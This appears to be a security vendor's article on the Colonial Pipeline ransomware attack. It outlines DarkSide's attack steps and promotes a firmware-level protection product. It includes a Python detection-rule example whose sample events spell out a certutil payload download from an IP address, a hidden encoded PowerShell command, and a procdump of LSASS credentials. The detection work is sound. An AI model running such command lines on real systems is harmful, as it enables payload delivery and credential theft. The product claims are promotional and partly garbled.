The Colonial Pipeline Case
In early May this year, Colonial Pipeline learned of a ransomware attack when an employee found a message from the hackers on one of the computers in the server room. Not long after receiving the ransom note, the company's CEO, Joseph Blount, decided to pay the ransom so that the company could reclaim its systems and resume service after an unprecedented halt of operations caused by the disrupted system. The CEO made the hard decision to pay the hackers $4.4 million, stating that they had to take that decision because they did not know how badly their systems were compromised, and therefore could not know how long it would take to restore the systems and get the pipeline back on track.
Mr. Blount defended what he called a bold decision and the only plausible choice he had left, given the criticality of the infrastructure the company was running. The Colonial Pipeline is known for its enormous contribution to economic continuity on the East Coast, supplying a rough estimate of over 45% of the fuel in the area. Acknowledging that the decision was controversial, Mr. Blount explained to the public the further damage that a longer delay before paying the ransom could have caused.
How the Colonial Attack was executed
The mechanism used by the alleged hacking group DarkSide is still largely speculation, with experts believing that the attack could have been the result of successful social engineering (phishing) or brute-force attacks that allowed the hackers to obtain administrative privileges and take the whole system down. The steps below illustrate the mechanism of a DarkSide attack:
1. Attack Initiation
The first step involves gaining access to a firm's networks and systems through methods such as malicious phishing links, SQL injection, and brute-force password cracking. In the Colonial Pipeline attack, it is believed that phishing was used to obtain access credentials.
2. Gaining Access
So far, cybersecurity experts have identified three distinct tactics that the attackers leverage to gain access to secured systems.
- Downloading and making use of TeamViewer.
- Making use of command and control (CS) infrastructure.
- Backdoor methods such as keynoting, executing .NET commands and taking
3. Ransomware Installation
After gaining privileged administrative access, the attackers use CertUtil.exe and PowerShell.exe to download and execute the DarkSide code. In the process, a copy of the malware is saved on the infected device.
4. Privilege Escalation
To install the ransomware, the threat actors escalate their privileges. This is done using CVE-2020-1472, Mimikatz, and the Local Security Authority Subsystem Service (LSASS).
5. File Encryption and Data Exfiltration
Having already gained administrative privileges and downloaded the malicious code, the attackers start collecting sensitive data. Once they have collected all the data they want to hold for ransom, they encrypt it using the copy of the ransomware initially stored in a shared folder on the affected device. This gives them the ability to spread the malicious code across the organization's network and systems in the form of scheduled tasks.
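As an added example (not part of the original article, and not code from X-PHY or Colonial Pipeline), the Python below runs constructed process-creation events through detection rules keyed to the tooling named in steps 3 and 4: CertUtil.exe and PowerShell.exe used to fetch and run a payload, and LSASS credential access. The hostnames, file paths, IP address and command lines are constructed sample data, and the regexes are illustrative, not a vendor's rule set.

```python
import re

# Each rule: (name, ATT&CK technique, image pattern, command-line pattern); both must match.
# Rules cover certutil/PowerShell download-and-run (step 3) and LSASS access (step 4).
RULES = [
    ("certutil_remote_download", "T1105",
     re.compile(r"\\certutil\.exe$", re.I),
     re.compile(r"[-/]urlcache\b.*https?://", re.I)),
    ("powershell_encoded_or_download", "T1059.001",
     re.compile(r"\\powershell\.exe$", re.I),
     re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}|downloadstring|invoke-webrequest", re.I)),
    ("lsass_memory_access", "T1003.001",
     re.compile(r".", re.I),  # any image; the command line carries the signal here
     re.compile(r"sekurlsa|procdump.*lsass|minidump.*lsass|lsass.*\.dmp", re.I)),
]

# Constructed Sysmon-style process-creation events (host, image, command line); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.10/payload.bin C:\Users\Public\p.bin"},
    {"host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand QQBCAEMAQQBCAEMAQQBCAEMAQQBCAEMA"},
    {"host": "ws01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -verify C:\certs\corp.cer"},  # benign certutil use: must not alert
    {"host": "dc01", "image": r"C:\Tools\procdump64.exe",
     "cmdline": "procdump64.exe -ma lsass.exe lsass.dmp"},
]

def match_rules(event):
    """Return the (name, technique) pairs whose image AND command-line patterns both fire."""
    return [(name, tech) for name, tech, img_re, cmd_re in RULES
            if img_re.search(event["image"]) and cmd_re.search(event["cmdline"])]

def triage(events):
    """One alert per rule hit. A host tripping more than one distinct rule is escalated,
    because download, execution and credential theft on one machine is the chain above."""
    alerts, per_host = [], {}
    for ev in events:
        for name, tech in match_rules(ev):
            alerts.append({"host": ev["host"], "rule": name, "technique": tech,
                           "cmdline": ev["cmdline"]})
            per_host.setdefault(ev["host"], set()).add(name)
    escalate = sorted(h for h, rules in per_host.items() if len(rules) > 1)
    return alerts, escalate

if __name__ == "__main__":
    alerts, escalate = triage(SAMPLE_EVENTS)
    for a in alerts:
        print(f"[{a['technique']}] {a['host']}: {a['rule']} <- {a['cmdline']}")
    print("escalate hosts:", escalate)  # escalate hosts: ['ws01']
```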
DarkSide actors gained access to the Colonial Pipeline system using administrative access credentials. Existing software defenses are designed only to protect against known threats, so the use of valid access credentials could not be detected as a threat. After gaining privileged administrative access, the attackers made use of CertUtil.exe and PowerShell.exe to download and execute the DarkSide code. In this process, a copy of the malware is saved on the infected device. Once the DarkSide code is injected, XPHY Guard will immediately detect it as malicious because of its data access behavior.
The Guardian Pro-X and Security Scout features within the X-Guard Threat Lock use AI at the firmware level to survey large amounts of data in real time and detect anomalies in data access patterns. In this case, the extraction of data and encryption of files would have shown a disparity from the normal disk access pattern and thus been classified as malicious. As such, the X-PHY Factor Encryption lock feature could trigger a data lockdown to prevent the attacker from accessing the data and, in the process, activate the Keycode 2-factor. At this point, X-PHY enters safe mode and the data on the disk cannot be accessed until multidimensional authentication (MDA) codes are provided.